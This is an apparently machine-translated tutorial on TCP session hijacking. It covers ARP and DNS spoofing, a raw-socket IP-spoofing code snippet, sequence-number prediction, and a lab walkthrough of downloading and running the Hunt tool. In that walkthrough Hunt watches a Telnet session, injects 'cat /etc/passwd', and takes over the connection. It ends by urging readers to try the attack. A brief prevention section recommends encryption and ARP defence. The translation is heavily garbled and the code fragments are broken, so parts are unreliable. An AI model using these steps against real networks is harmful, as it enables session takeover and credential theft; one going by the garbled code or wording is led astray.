Session hijacking attack actual combat
Foreword
Usually, the invasion of everyone is aimed at a host. After obtaining administrator privileges, it is very proud; in fact, the real invasion is to occupy the entire internal network. There is a lot of attack methods for the internal network, but more effective methods are non-ARP spoofing, and DNS deceives are not. However, no matter what technology used, it is nothing more than grasping the target's packet, and then analyzing sensitive data. If the target is used in the target (using the Hub Hub Network), then you only need to set the NIC to "Mixed Mode", hang the sniffier, you can simide the data you want to get. If it is a switched network (using a switch network), this method will not pass, because three network environments are unable to span for sniffer: "Bridge", "Switch", "Router". Unfortunately, for ARP spoofing, switching networks still incompetent, if we use ARP deception, in a higher level of "intrusion", thereby truly control internal networks. This is also the session hijacking attack on this article ...
First, the principle of conversation
1, what is a session hijacking
In real life, if you go to the market to buy dishes, you ask for some other things before paying the money, come back later; if this time a stranger requires the dish, selling vegetables Will you give a stranger? ! Of course, this is just a metaphor, but this is just a metaphor of session. The so-called session is a communication between two hosts. For example, you telnet to a host, this is a Telnet session; you browse a website, this is an HTTP session. The session hijack is a combination of attacks, and sniffing techniques. For example, in a normal session process, an attacker is involved in a third party, he can insert malicious data in the normal packet, or you can simide the session between the two parties, or even replace a host take over the session. . We can divide the session hijacking into two types: 1) MANI in the Middle Middle, Mitm, 2) Injection; and can also divide the session hijacking into two forms: 1) Passive hijacking, 2) Active hijacking; passive hijacking is actually the data stream of the two parties in the background, the active data is obtained in the cluster; and the active hijacking is the "kick" "kick" it under the session, and then attack Substituted and take over the session, this attack method is very harmful, and attackers can do a lot of things, such as "CAT ETC / MASTER.PASSWD" (SHADOW file under FreeBSD). Figure 1 is a schematic diagram of a session hijacking.
Mitm Attack Introduction
This is what we often say, "middleman attack", more discussions online is the SMB session hijacking, which is also a typical intermediary attack. To implement the intermediary attack, the attacker first needs to use ARP spoof or DNS spoof, and the communication between the sessions is expanded, and this change is completely transparent to both parties. About ARP deception hacan defense line introduction is more, online information is also more, I will not talk more, I just talk about DNS deception. DNS (Domain Name System), the domain name server, we have to use almost every day. For normal DNS requests, for example, enter www.hacker.com.cn in the browser, then view the HOSTS file first, if there is a corresponding IP, use this IP address to access the website (in fact, using the HOSTS file to implement DNS Deception); if not, the DNS server will be requested; the DNS server then resolves its corresponding IP address, returns to me, and finally you can log in to the website of the hacking line. And DNS spoof is, the target sends its DNS request to the attacker, then the attacker for DNS response will replace the correct IP address as other IP, then you will log in to the IP specified by this attacker, and the attacker is early Just arrange a malicious web page in this IP, but you have already been "set" in the attacker, but you can do it in WAN, more common, "Web Server Redirect", "Mail Server Redirection", etc. But regardless of ARP spoof, or DNS spoof, middleman attacks change the normal traffic flow, it is equivalent to a transparent agent between the two sides of the session, you can get everything I want to know, or even use some defective encryption agreement. achieve.
Introduction to Injection Attack
This method of session hijacking is simpler than the intermediary attack, it does not change the traffic flow between the session, but insert the normal communication stream in both parties. In the injection attack, two technologies need to be implemented: 1) IP deception, 2) predict the TCP serial number. If it is a UDP protocol, simply falsify the IP address, then it can be sent, because the UDP does not have a so-called TCP three-time handshake, but the UDP-based application protocol has a flow control mechanism, so there are some additional work. For IP deception, there are two situations that need to be used: 1) Hide your IP address; 2) Implement invasion with the trust relationship between two machines. On the UNIX / Linux platform, you can use the socket to construct the IP package directly, fill in false IP addresses in the IP header, but require root privileges; on the Windows platform, Winsock cannot be used, you need to use WinPacp (you can also use libnet). For example, in the Linux system, first open a Raw Socket, then write IP headers and other data yourself. You can refer to the following instance code:
Sockfd = Socket (AF_INET, SOCK_RAW, 255);
Setsockopt (SockFD, Ipproto_IP, IP_HDRINCL, & ON, SIZEOF (ON));
Struct ip * IP;
Struct TCPHDR * TCP;
Struct pseudohdr pseudoheader;
IP-> ip_src.s_addr = xxx;
PseudoHeader.saddr.s_addr = ip-> ip_src.s_addr; tcp-> check = tchksum ((u_short *) & pseudoheader, 12 sizeof (struct tcphdr));
Sendto (Sockfd, Buf, Len, 0, (const socddr *) addr, sizeof (struct sockaddr_in);
For the TCP protocol, the attacker should first use the sniffing technology to simide the target, then construct the correct serial number from the brief information. If not, you must guess the target's ISN (Initial serial number), this invisibly increases the difficulty of hijacking the session. Then why do you want to guess the serial number of the session? please watch the following part.
2, TCP session hijacking
This article mainly describes the session hijacking of TCP protocols. If you hijack some unreliable agreements, it will be easy because they do not provide some authentication measures; and the TCP protocol is to be a reliable transmission protocol, so you have to discuss it.
According to the provisions in TCP / IP, communicate with TCP protocols require two serial numbers, TCP protocols use these two sequence numbers to ensure connection synchronization and secure communication, system TCP / IP protocol stack based on time or linear generation of these values . During communication, the serial number of both sides is interdependent, which is why TCP protocols are reliable transfer protocols (see RFC 793). If the attacker is hijacking at this time, the result is definitely a failure, because the session "does not know" attacker, the attacker cannot provide legal serial numbers; so the key to the session hijack is to predict the correct serial number, the attacker can Take the sniffing technology to get this information.
The serial number of the TCP protocol
Now discuss issues related to the serial number of the TCP protocol. In each packet, there are two serial numbers, which are:
SEQ: The serial number of the first byte in the current packet
ACK: I hope to receive the serial number of the first byte in the other party packet.
Suppose both sides now need to connect:
S_SEQ: Sequence Number of the next byte to be sent
S_Ack: The serial number of the next byte to receive
S_Wind: Receive window
// Or servers (Server)
C_SEQ: The serial number of the next byte to be sent
C_Ack: Sequence Number of the next byte to receive
C_Wind: Receive window
// Or above for the client (Client)
They must meet the following logical relationships, otherwise the packet is discarded and returns an ACK package (including the desired serial number).
C_ack <= c_seq <= c_ack c_wind
S_Ack <= s_seq <= s_ack s_wind
If you do not meet the logical relationships on the top, you will have a "deadly weak point", please look down.
Fatal weaknesses
This fatal weakness is the ACK Storm. When the session receives an undesired packet, return ACK packets with your desired serial number; and on the other end, this packet is not expected, and will return ACK again with your desired serial number. Package ... so, in this way, go back and forth, forming a vicious circle, eventually leading to the ACK storm. The better solution is to make ARP spoof, so that the data package "normal" is sent to the attacker, and then set the package forward, and finally you can hijack, and you don't have to worry that there will be ACK storms. Of course, not all systems will appear ACK storm. For example, the TCP / IP protocol stack of the Linux system is slightly different from the description of the RFC. Note that the ACK storm is only hijacked in the injection. TCP session hijacking process
Suppose the host A and host B are now TCP sessions, c is an attacker (as shown in Figure 2), the hijacking process is as follows:
A Send a packet to b
SEQ (HEX): X Ack (HEX): Y
Flags: -ap --- window: zzzz, package size is: 60
B response A a packet
SEQ (HEX): Y Ack (HEX): x 60
Flags: -ap --- window: zzzz, package size is: 50
A responding to b
SEQ (HEX): X 60 ACK (HEX): Y 50
Flags: -ap --- window: zzzz, package size is: 40
B responding to a packet
SEQ (HEX): Y 50 ACK (HEX): X 100
Flags: -ap --- window: zzzz, package size is: 30
Attacker C pretending host A Send a packet to host B
SEQ (HEX): X 100 Ack (HEX): Y 80
Flags: -ap --- window: zzzz, package size is: 20
B responding to a packet
SEQ (HEX): Y 80 ACK (HEX): x 120
Flags: -ap --- window: zzzz, package size is: 10
Now, host B executes an attacker C pretending to be a command sent by host A and returns a packet of host A; however, host A does not recognize the data packet sent by the host B, so host A will be in the desired serial number Returns a packet to the host B, and then form an ACK storm. If the ACK storm (such as the ARP spoofed) mentioned before, you can successfully make a session hijacking.
It is said that the theoretical knowledge is here, and I will demonstrate a session hijacker with a specific example.
Second, the conversation is hijacking practice
1, a few words
There are many tools that can be hijacked. Compare juggernaut, which can make TCP sessions hijacked network Sniffer programs; TTY Watcher, and it is a connection to the connection on a single host. Hijack. There is also a toolkit such as DSNIFF, you can also hijack the session, just see if you will use it. However, you can hijack the session, but also the tool of hunt. Its author is Pavel Krauz, which can work under Linux and some UNIX platforms. Its function is very powerful, first, whether it is in a shared network or a switched network, it can work properly; secondly, an interian attack and injection attack can be performed. You can also perform sniffing, view sessions, monitoring sessions, resetting sessions. Through the previous narrative, we know that in the injection attack, it is easy to appear ACK storm. The solution is to make ARP spoof; and when using Hunt to attack, it does not make ARP spoof, but after the session, after the session, The session sends a TCP package with the RST flag to interrupt the session to avoid the ACK storm to continue. The intermediary attack is the first ARP spoof and then the session is hijacked. The latest version of Hunt is 1.5, you can download the source code package and binary files to the Pavel Krauz website: http://lin.fsid.cvut.cz/~kra/# Hunt.
Now let's see if you use hunt, you first download and compile the source code:
[root @ dahubaobao hunt] #wget
http://www.ringz.org/hunt-1.5.tgz
[root @ dahubaobao hunt] #tar zxvf hunt-1.5.tgz
[root @ dahubaobao hunt] #CD hunt-1.5
[root @ dahubaobao hunt-1.5] #make
[root @ dahibaobao hunt-1.5] #. / hunt
// hunt is a complete operation of the test, as shown in Figure 3
Explain the meaning of each option
L / W / R) List / Watch / Reset Connections
// L (letter L) is a session on the current network; W is a session on the current network; r is resetting a session on the current network.
a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used)
// Intermediate attack (session hijacking), Hunt first carried out ARP spoof, and then hijacked. Use this method to avoid ACK storms.
s) Simple Hijack
// Simple session hijacking, that is, injectable attack. Ack storm will appear.
d) daem RST / ARP / SNIFF / MAC
/ / This option achieves four functions, which are: termination sessions, automatically send TCP packets with RST flags; ARP deception, packet forwarding; do not say, sniffing function; collect MAC addresses on the current network.
Other options are simple, not more. Let's take a look at the specific example, I think everyone can't wait! ^ _ ^
2, application example
test environment:
Attack: Red Hat Linux 9.0 IP: 192.168.0.10
Host A: Windows Advanced Server IP: 192.168.0.1
Host B: FreeBSD 4.9 Stable IP: 192.168.0.20
[root @ dahibaobao hunt-1.5] #. / hunt
/ *
* hunt 1.5
* Multipurpose Connection Intruder / Sniffer for Linux
* (c) 1998-2000 by KRA
* /
STARTING HUNT
--- Main menu --- Rcvpkt 0, Free / Alloc 63/64 ------
L / W / R) List / Watch / Reset Connections
u) Host Up Tests
a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used)
s) Simple Hijack
d) daem RST / ARP / SNIFF / MAC
o) Options
x) EXIT
*> l // View sessions on the current network
0) 192.168.0.1 [3465]? 192.168.0.20 [23]
// Host A is in telnet to host B
--- Main menu --- Rcvpkt 0, Free / Alloc 63/64 ------
L / W / R) List / Watch / Reset Connections
u) Host Up Tests
a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used)
s) Simple Hijack
d) daem RST / ARP / SNIFF / MAC
o) Options
x) EXIT
*> w // monitor sessions on the current network
0) 192.168.0.1 [3465]? 192.168.0.20 [23]
Choose Conn> 0 // Select the session intended to monitor. Since my conditions are limited, I can't simulate multiple sessions, please see more.
Dump [S] RC / [D] ST / [B] OTH [B]> // Enter
Print Sec / DST Same Charactes Y / N [N]> // Enter
You can monitor the session now. Everything you entered host A, we can see, as shown in Figure 4. Host A after telnet and login, directly su root, password: The password behind the root. Now this system has been completely controlled, let's play!
--- Main menu --- Rcvpkt 0, Free / Alloc 63/64 ------
L / W / R) List / Watch / Reset Connections
u) Host Up Tests
a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used)
s) Simple Hijack
d) daem RST / ARP / SNIFF / MAC
o) Options
x) EXIT
*> s // for injection chase hijacking
0) 192.168.0.1 [3465]? 192.168.0.20 [23]
Choose conn> 0
DUMP Connection Y / N [N]>
ENTER THE Command String You wish Executed or [Cr]> CAT / etc / passwd
The attacker's intention is to obtain the contents of the main PASSWD file, but due to the injection of the hijacking defect, the ACK storm has caused the Hunt to send a TCP package with the RST flag to block the ACK storm. Specifically, as shown in Figure 5.
--- Main menu --- Rcvpkt 0, Free / Alloc 63/64 ------
L / W / R) List / Watch / Reset Connections
u) Host Up Tests
a) ARP / Simple Hijack (Avoids Ack Storm if ARP Used)
s) Simple Hijack
d) daem RST / ARP / SNIFF / MAC
o) Options
x) EXIT
*> a // to make an intermediary session hijack
0) 192.168.0.1 [3862]? 192.168.0.20 [23]
Choose conn> 0
ARP SPOOF SRC IN DST Y / N [Y]>
SRC Mac [xx: xx: xx: xx: xx: xx]>
ARP SPOOF DST IN SRC Y / N [Y]>
DST Mac [xx: xx: xx: xx: xx: xx]>
Input Mode [R] AW, [L] INE ECHO / R, LINE [E] CHO [R]>
DUMP Connectin Y / N [Y]> N
Press Key to Take Voer of Connection
Arp spoof of 192.168.0.20 with favor: xx: xx: xx in host 192.168.0.1 fa
Iled
Do you want to force arp spoof nutil successed y / n [y]>
Ctrl-c to break
Ctrl C // Manually input Ctrl C interrupt, no waiting
- Operation Canceled - Press Any Key>
ARP SPOOF FAILED
ARP SPOOF OF 192.168.0.20 in Host 192.168.0.1 failed
You Took over the connection
Ctrl-] to break
-bash-2.05b $ ID
....................
Now, an attacker has successfully hijacked the Telnet session between host a and b. All command attackers entering host A can be seen, and an attacker can insert commands themselves, such as the example shown in Figure 6. As mentioned before, this session hijacked the ARP spoof, then hijacked, so the ACK storm would not appear; and this way is harmful than the injection session, from the above, I think I can see it, I don't have to say anything. There are also some functions such as Sniffer, it is very simple. Since it is not in this text, it is not more.
Third, the session hijacking prevention
Prevent conversation is a relatively large engineering. First, switching networks should be used instead of shared networks, although tools like hunt can implement session hijacking in the exchange environment, but they should also use switched networks to replace shared networks because this can prevent the most basic sniff attack. However, the most fundamental solution is to use encrypted communication, use SSH instead of Telnet, use SSL instead of http, or simply use IPsec / VPN, so that the session is hijacked. Second, monitor network traffic, if there is a large number of ACK packets in the network, it is possible to have a session hijack attack.
Another point is more important, it is to prevent ARP deception. The premise of realizing the intermediary attack is ARP spoofing, if the attacker will stop the ARP spoofing, what happens to the middleman? ! How to prevent ARP spoofs, the hacker defense has been introduced in detail, and can be referred to the No. 9 Journal of 2003.
to sum up
For penetration internal networks, session hijack is indeed a more effective way, we should master. This article is very practical, please try the best home, and hope to master this technology. This powerful tool use is very simple, but you can hijack the session, and we really admire the author's programming.